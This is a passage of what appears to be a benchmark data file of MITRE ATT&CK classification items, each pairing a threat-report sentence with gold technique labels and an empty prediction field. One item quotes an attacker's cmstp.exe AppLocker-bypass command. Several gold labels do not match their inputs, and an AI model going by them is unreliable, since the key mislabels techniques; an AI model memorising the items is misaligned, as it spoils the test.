"gold": "- T1057: Process Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The macOS version of the malicious application is a DMG Installer that has a disk image format that Apple commonly uses to distribute software over the internet. The installer looks legitimate and has a valid digital signature from Sectigo (Obtain Capabilities: Digital Certificates [T1588.004]). It has very similar functionality to the Windows version\n\t - T1553.002: Subvert Trust Controls - Code Signing\n- Text: Lazarus Group has used code signing certificates issued by Sectigo RSA for some of its malware and tools.\n\t - T1588.003: Obtain Capabilities - Code Signing Certificates\n- Text: PROMETHIUM has created self-signed certificates to sign malicious installers.\n\t - T1587.002: Develop Capabilities - Code Signing Certificates\n", "input": "\nused a valid AppleDeveloperID to sign the code to get past security restrictions.", "gold": "- T1553.002: Subvert Trust Controls - Code Signing", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Stolen Pencil has a tool to add a Windows admin account in order to allow them to ensure continued access via RDP.\n\t - T1078.003: Valid Accounts - Local Accounts\n- Text: actors used legitimate credentials of banking employees to perform operations that sent them millions of dollars.\n\t - T1078: Valid Accounts\n- Text: Wizard Spider has used administrative accounts, including Domain Admin, to move laterally within a victim network.\n\t - T1078.002: Valid Accounts - Domain Accounts\n", "input": "\nWe are unable to confirm if all of these stolen credentials are indeed valid sets of credentials, but based upon previously observed activity, timestamping, and known behaviors, it is highly probable that these credentials were or may still be valid", "gold": "- T1003: OS Credential Dumping", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Industroyer attempts to perform an HTTP CONNECT via an internal proxy to establish a tunnel.\n\t - T1572: Protocol Tunneling\n- Text: The C2 domain used in this shellcode has been categorized as malware in DNS Security, URL Filtering and WildFire, which are security subscriptions for Next-Generation Firewall customers. App-ID, the traffic classification system in Next-Generation Firewalls, is capable of identifying applications irrespective of port, protocol, encryption (SSH or SSL) or any other evasive tactic used by the application. This shellcode attempts to communicate over TCP port 443 with traffic that does not conform to proper SSL or any other known application. As a matter of best practice, we advise customers to block unknown outbound TCP traffic in their security policies\n\t - T1571: Non-Standard Port\n- Text: Mori can communicate using HTTP over IPv4 or IPv6 depending on a flag set.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", "input": "\nhas used both HTTP and HTTPS for C2.", "gold": "- T1071: Application Layer Protocol", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FIN7 uses CARBANAK as a post-exploitation tool in later phases of an intrusion to cement their foothold in a network and maintain access, frequently using the video command to monitor users and learn about the victim network, as well as the tunnel command to proxy connections into isolated portions of the victim environment\n\t - T1090: Proxy\n\t - T1049: System Network Connections Discovery\n- Text: MuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location. MuddyWater has used a series of compromised websites that victims connected to randomly to relay information to command and control (C2).\n\t - T1090.002: Proxy - External Proxy\n- Text: Mythic can leverage a peer-to-peer C2 profile between agents.\n\t - T1090.001: Proxy - Internal Proxy\n", "input": "\nFigure 12: DrAGon_MidDLe stores the list of proxy URLs used to interact with C2 server Section 2 The second section of the PowerShell script has the ability to perform encryption and decryption of messages that are exchanged between the system and the C2 server", "gold": "- T1573: Encrypted Channel\n- T1090: Proxy", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n\t - T1027: Obfuscated Files or Information\n- Text: is initially packed.\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: Lazarus Group has used a custom hashing method to resolve APIs used in shellcode.\n\t - T1027.007: Obfuscated Files or Information - Dynamic API Resolution\n", "input": "\nThis function is able to obfuscate code so that every iteration of the code is presented differently", "gold": "- T1140: Deobfuscate/Decode Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: RAR Creates RAR files per logical drive containing data with timestamps for the past 7 days, then uploads RAR to the C2 server using a POST command at the path \u201c/FeedBack.php\u201d\n\t - T1041: Exfiltration Over C2 Channel\n\t - T1560: Archive Collected Data\n- Text: CosmicDuke exfiltrates collected files automatically over FTP to remote servers.\n\t - T1020: Automated Exfiltration\n- Text: AppleSeed can stage files in a central location prior to exfiltration.\n\t - T1074.001: Data Staged - Local Data Staging\n", "input": "\nuploads files from a specified directory to the C2 server.", "gold": "- T1005: Data from Local System", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Office365DCOMCheck.vbs or SystemDiskClean.vbs) within the %TEMP% folder: CreateObject(\"WScript.Shell\").Run \"\" & WScript.Arguments(0) & \"\", 0, False The scheduled task will then run every five minutes, which provides persistent execution of the downloader script\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n\t - T1059: Command and Scripting Interpreter\n\t - T1064: Scripting\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: Viewing results Commands scheduled with at run as background processes. Output is not displayed on the computer screen. To redirect output to a file, use the redirection symbol (>). If you redirect output to a file, you need to use the escape symbol (^) before the redirection symbol, whether you are using at at the command line or in a batch file. For example, to redirect output to Output.text, type: at 14:45 c:\\test.bat ^>c:\\output.txt The current directory for the executing command is the systemroot folder. Changing system time If you change the system time at a computer after you schedule a command to run with at, synchronize the at scheduler with the revised system time by typing at without command-line options. Storing commands Scheduled commands are stored in the registry. As a result, you do not lose scheduled tasks if you restart the Schedule service. Connecting to network drives Do not use a redirected drive for scheduled jobs that access the network. The Schedule service might not be able to access the redirected drive, or the redirected drive might not be present if a different user is logged on at the time the scheduled task runs. Instead, use UNC paths for scheduled jobs\n\t - T1053.002: Scheduled Task/Job - At\n- Text: This DLL is used to create a scheduled task that points to the QuasarRAT binary, microsoft_network.exe, allowing it to remain persistent after reboot\n\t - T1053: Scheduled Task/Job\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n", "input": "\nAdditionally, the first stage JavaScript creates a scheduled task that executes the second stage code within a minute \u2013 this delayed execution helps to bypass behavior analysis since the second stage is not directly executed by the first stage", "gold": "- T1053.005: Scheduled Task/Job - Scheduled Task\n- T1074: Data Staged\n- T1064: Scripting\n- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: malware has communicated with its C2 server over ports 4443 and 3543.\n\t - T1571: Non-Standard Port\n- Text: provides additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet\n\t - T1205.001: Traffic Signaling - Port Knocking\n- Text: Indeed, any decent firewall would block incoming packets to\u00a0any ports that have not explicitly been opened for operational purposes. However, with Chaos using a raw socket, the backdoor can be triggered on ports running an existing legitimate service. As an example, a Webserver that would only expose SSH (22), HTTP (80) and HTTPS (443) would not be reachable via a traditional backdoor due to the fact that those services are in use, but with Chaos it becomes possible\n\t - T1205: Traffic Signaling\n", "input": "\nA variant can use port 127 for communications.", "gold": "- T1571: Non-Standard Port", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: UNC2452 used WMI event subscriptions for persistence.\n\t - T1546.003: Event Triggered Execution - Windows Management Instrumentation Event Subscription\n- Text: As soon as the user enabled the macro, a robust Visual Basic Application (VBA) script began to execute. First, it would query Windows Management Instrumentation (WMI) to check if any of the following applications were running\n\t - T1047: Windows Management Instrumentation\n- Text: can use DCOM (targeting the 127.0.0.1 loopback address) to execute additional payloads on compromised hosts.\n\t - T1021.003: Remote Services - Distributed Component Object Model\n", "input": "\nSubscriptions consist of three core WMI classes: a Filter, a Consumer, and a FilterToConsumerBinding", "gold": "- T1047: Windows Management Instrumentation", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MuddyWater has used CMSTP.exe and a malicious INF to execute its POWERSTATS payload.\n\t - T1218.003: System Binary Proxy Execution - CMSTP\n- Text: APT32 created a Scheduled Task/Job that used regsvr32.exe to execute a COM scriptlet that dynamically downloaded a backdoor and injected it into memory. The group has also used regsvr32 to run their backdoor.\n\t - T1218.010: System Binary Proxy Execution - Regsvr32\n- Text: Kimsuky has used mshta.exe to run malicious scripts on the system.\n\t - T1218.005: System Binary Proxy Execution - Mshta\n", "input": "\nhas used the command cmstp.exe /s /ns C:\\Users\\ADMINI~W\\AppData\\Local\\Temp\\XKNqbpzl.txt to bypass AppLocker and launch a malicious script.", "gold": "- T1218.003: System Binary Proxy Execution - CMSTP", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MarkiRAT can exfiltrate locally stored data via its C2.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: GreyEnergy has a module to harvest pressed keystrokes.\n\t - T1056.001: Input Capture - Keylogging\n- Text: Once the macro collected all the information, it sends the data to the C2 server over an HTTP POST request\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", "input": "\nXAgent C2 Communications The macOS variant of XAgent has ability to receive commands from threat actors via its command and control channel, but is also capable of logging key strokes via its keylogger functionality", "gold": "- T1056: Input Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: injects its malware variant, , into the cmd.exe process.\n\t - T1055: Process Injection\n- Text: After the system reboots, the file \u201cAJWrDz.exe\u201d executes, which in turn triggers the side-loading of the malicious (and fake) DLL file \u201cdbghelp.dll\u201d. This malicious DLL file injects itself to Windows Media Player process \u2014 wmplayer.exe, and reflectively loads the renamed jesus.dmp file, \u201cAJWrDz.dmp\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n- Text: Sidewinder has used the Windows service \"winmgmts:\\\\.\\root\\SecurityCenter2\" to check installed antivirus products.\n\t - T1518.001: Software Discovery - Security Software Discovery\n", "input": "\nFor example, we can see it will inject itself to one these three processes: %ProgramFiles(x86)%\\Sophos\\AutoUpdate\\ALUpdate.exe %ProgramFiles(x86)%\\Common Files\\Java\\Java Update\\jusched.exe %ProgramFiles(x86)%\\Common Files\\Adobe\\ARM\\1.0\\armsvc.exe The attempt to inject itself into a process belonging to antivirus product suite is particularly bold", "gold": "- T1036: Masquerading\n- T1055: Process Injection", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cutwail spam levels in the last three months have been significantly lower. The introduction of steganography may suggest that NARWHAL SPIDER has been developing new, innovative methods to evade detection and improve infection rates. Although not commonly used by eCrime actors, steganography has been used for malware delivery in the past, such as the Lurk Downloader and StegoLoader.\n\t - T1027.003: Obfuscated Files or Information - Steganography\n\t - T1001.002: Data Obfuscation - Steganography\n- Text: HAMMERTOSS is controlled via commands that are appended to image files.\n\t - T1001.002: Data Obfuscation - Steganography\n- Text: DarkWatchman uses HTTPS for command and control.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", "input": "\nWhen the command and control is operating over HTTP or HTTPS, Duqu uploads data to its controller by appending it to a blank JPG file.", "gold": "- T1001: Data Obfuscation", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: stores the encoded configuration file in the Registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentContorlSet\\Control\\WMI\\Security.\n\t - T1112: Modify Registry\n- Text: Gelsemium can set persistence with a Registry run key.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: This update to Emissary allowed the Trojan to run as a service. The configuration now contains settings for the Emissary service, which the Trojan will store in and access from the following registry keys:\n\t - T1574.011: Hijack Execution Flow - Services Registry Permissions Weakness\n", "input": "\nhas a command to create, set, copy, or delete a specified Registry key or value.", "gold": "- T1112: Modify Registry", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: UNC2452 has used GoldFinder to perform HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request travels through.\n\t - T1016.001: System Network Configuration Discovery - Internet Connection Discovery\n- Text: FALLCHILL is the primary component of a C2 infrastructure that uses multiple proxies to obfuscate network traffic between HIDDEN COBRA actors and a victim\u2019s system. According to trusted third-party reporting, communication flows from the victim\u2019s system to HIDDEN COBRA actors using a series of proxies as shown in figure 1\n\t - T1090.002: Proxy - External Proxy\n- Text: Security Intelligence . Topics . Tricks of the Trade: A Deeper Look Into TrickBot\u2019s Machinations . TrickBot is a new banking Trojan. An Unusual Man-in-the-Browser Technique . Nowadays, most modern financial malware families are capable of injecting malicious code into ongoing browser sessions (e.g. For this purpose, and much like other advanced banking Trojans, TrickBot deploys a browser-hooking engine designed to intercept communications to and from the victim\u2019s internet browser. With the real-time fetching trick, the malicious code injections themselves are kept securely on the attacker\u2019s server, not in a file on the victim\u2019s endpoint. 7) Finally, TrickBot\u2019s financial module replaces the original response that would normally come from the bank with the C2\u2019s response, and the injected page is displayed on the victim\u2019s end. The actor can turn the webinjections on or off on the fly, easily modify the injections and then push an update to some or all the infected victims instantaneously. Figure 2: TrickBot\u2019s Server Side Web-Injects \u2014 Top Level Flow. Figure 5: TrickBot and Dyre both use \u201csourcelink\u201d and \u201csourcequery\u201d for their communications. TrickBot passes the target URLs list to its financial module, which is injected into the browser using pipes communication. A redirection attack, in short, means that instead of injecting malicious code into the original webpage, the victim is now redirected to a new site forged by the fraudsters\n\t - T1185: Browser Session Hijacking\n", "input": "\ntests if it can reach its C2 server by first attempting a direct connection, and if it fails, obtaining proxy settings and sending the connection through a proxy, and finally injecting code into a running browser if the proxy method fails.", "gold": "- T1008: Fallback Channels", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Dragonfly has used spearphising campaigns to gain access to victims.\n\t - T1566: Phishing\n- Text: We named Lazarus the most active group of 2020. We\u2019ve observed numerous activities by this notorious APT group targeting various industries. The group has changed target depending on the primary objective. Google TAG has recently published a post about a campaign by Lazarus targeting security researchers. We have seen Lazarus attack various industries using this malware cluster before. In mid-2020, we realized that Lazarus was launching attacks on the defense industry using the ThreatNeedle cluster, an advanced malware cluster of Manuscrypt (a.k.a. NukeSped). While investigating this activity, we were able to observe the complete life cycle of an attack, uncovering more technical details and links to the group\u2019s other campaigns\n\t - T1005: Data from Local System\n\t - T1566.002: Phishing - Spearphishing Link\n\t - T1204.002: User Execution - Malicious File\n- Text: Hancitor has been delivered via phishing emails with malicious attachments.\n\t - T1566.001: Phishing - Spearphishing Attachment\n", "input": "\nThe second email references a Hong Kong University alumni organization that fears votes in a referendum to appoint a Vice-Chancellor will be co-opted by pro-Beijing interests.[9] Figure 1: Lure Screenshots The group\u2019s previous activities against financial and policy organizations have largely focused on spear phishing emails written in English, destined for Western audiences", "gold": "- T1113: Screen Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BADNEWS establishes a backdoor over HTTP.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: has used Web shells to maintain access to victim websites.\n\t - T1505.003: Server Software Component - Web Shell\n- Text: RGDoor establishes persistence on webservers as an IIS module.\n\t - T1505.004: Server Software Component - IIS Components\n", "input": "\nWhen the malicious ISAPI filter captures a username matching this variable, it knows to handle the incoming HTTP request as a command to the web shell", "gold": "- T1033: System Owner/User Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Along with the HTTP part, the binary part was also updated. The encryption remained the same, but Emotet dropped Google Protocol Buffer and switched to its own format. The compression algorithm also changed, with zlib replaced by liblzf. More details about the new protocol can be found in the Threat Intel and CERT Polska reports.\n\t - T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n- Text: FunnyDream has compressed collected files with zLib and encrypted them using an XOR operation with the string key from the command line or `qwerasdf` if the command line argument doesn\u2019t contain the key. File names are obfuscated using XOR with the same key as the compressed file content.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n- Text: exfiltrates collected files over FTP or WebDAV. Exfiltration servers can be separately configured from C2 servers.\n\t - T1048: Exfiltration Over Alternative Protocol\n", "input": "\nscrapes memory for properly formatted payment card data.", "gold": "- T1005: Data from Local System", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Backdoor.Oldrea collects information about available drives, default browser, desktop file list, My Documents, Internet history, program files, and root of available drives. It also searches for ICS-related software files.\n\t - T1083: File and Directory Discovery\n- Text: Sandworm Team has exfiltrated internal documents, files, and other data from compromised hosts.\n\t - T1005: Data from Local System\n- Text: For all non-removable drives on a victim, executes automated collection of certain files for later exfiltration.\n\t - T1119: Automated Collection\n", "input": "\nsearches for files on the victim's machine.", "gold": "- T1083: File and Directory Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Payloads are now hosted on compromised websites. The payloads hosted on these websites consist of seemingly benign BMP image files. The malicious macros download the images and the ObliqueRAT payload is extracted to disk. The ObliqueRAT payload is renamed with the .pif file extension\n\t - T1027.003: Obfuscated Files or Information - Steganography\n- Text: Analysis of Daserf has shown that it regularly undergoes technical improvements to evade anti-virus detection.\n\t - T1027.005: Obfuscated Files or Information - Indicator Removal from Tools\n- Text: FatDuke has been packed with junk code and strings.\n\t - T1027.001: Obfuscated Files or Information - Binary Padding\n", "input": "\nA code comparison of hash 12c786c490366727cf7279fc141921d8 with hash 6de6a0df263ecd2d71a92597b2362f2c (from November 28, 2017).\u00a0 Conclusion We have found what may be an early data-gathering stage for future possible heists from financial organizations in Turkey (and possibly other countries)", "gold": "- T1550.002: Use Alternate Authentication Material - Pass the Hash", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Chimera has used \"tasklist\" to enumerate processes.\n\t - T1057: Process Discovery\n- Text: AQUATIC PANDA continued their reconnaissance from the host, using native OS binaries to understand current privilege levels as well as system and domain details. OverWatch threat hunters also observed an attempt to discover and stop a third-party endpoint detection and response (EDR) service\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n\t - T1007: System Service Discovery\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: LaZagne can obtain credential information running Linux processes.\n\t - T1003.007: OS Credential Dumping - Proc Filesystem\n", "input": "\nhas the ability to search for a given process name in processes currently running in the system.", "gold": "- T1057: Process Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Several days after that, on July 10, 2020, the attackers connected to the router via SSH and set up the PuTTy PSCP (the PuTTY Secure Copy client) utility on one of the infected machines. This utility was used to upload malware to the router VM. This enabled the attackers to place malware onto systems in the restricted segment of the enterprise network, using the router to host the samples. In addition, malware running in the network\u2019s restricted segment was able to exfiltrate the collected data to the command-and-control server via the Apache server set up on the same router\n\t - T1021.004: Remote Services - SSH\n- Text: uses VNC to connect into systems.\n\t - T1021: Remote Services\n", "input": "\ncan SSH to a remote service.", "gold": "- T1021: Remote Services", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TinyZBot contains functionality to collect information from the clipboard.\n\t - T1115: Clipboard Data\n- Text: After this, the Carbanak backdoor can then be used to log keystrokes and capture screenshots, steal and delete cookies, inject malicious code on sites, and monitor various traffic. For lateral movement, the malware abuses remote and system administration tools.\n\t - T1539: Steal Web Session Cookie\n\t - T1113: Screen Capture\n\t - T1550.004: Use Alternate Authentication Material - Web Session Cookie\n\t - T1020.001: Automated Exfiltration - Traffic Duplication\n\t - T1056.003: Input Capture - Web Portal Capture\n- Text: It does so by monitoring the content of the clipboard and if the data seem to be a cryptocurrency wallet, it replaces them with the attacker\u2019s own. This technique is not new; it has been used by other malware in the past \u2013 even the infamous BackSwap banking trojan implemented it in its earliest stages\n\t - T1565.002: Data Manipulation - Transmitted Data Manipulation\n", "input": "\nA variant accesses a screenshot saved in the clipboard and converts it to a JPG image.", "gold": "- T1115: Clipboard Data", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Dragonfly has created a directory named \"out\" in the user's %AppData% folder and copied files to it.\n\t - T1074.001: Data Staged - Local Data Staging\n- Text: BE2 also uses start menu locations for persistence: UsersuserAppDataRoamingMicrosoftWindowsStart\n\t - T1007: System Service Discovery\n\t - T1036: Masquerading\n\t - T1074: Data Staged\n- Text: The actors split collected files into approximately 3 MB chunks located on the Exchange server within the CU2\\he\\debug directory.\n\t - T1074.002: Data Staged - Remote Data Staging\n", "input": "\nFeedBack.php validates the sender by User-Agent, saves the data in the \u201cRAR\u201d server directory and stores the metadata in the mssql database for later reference", "gold": "- T1074: Data Staged", "predicted": "" }, { "instruction": "You are a 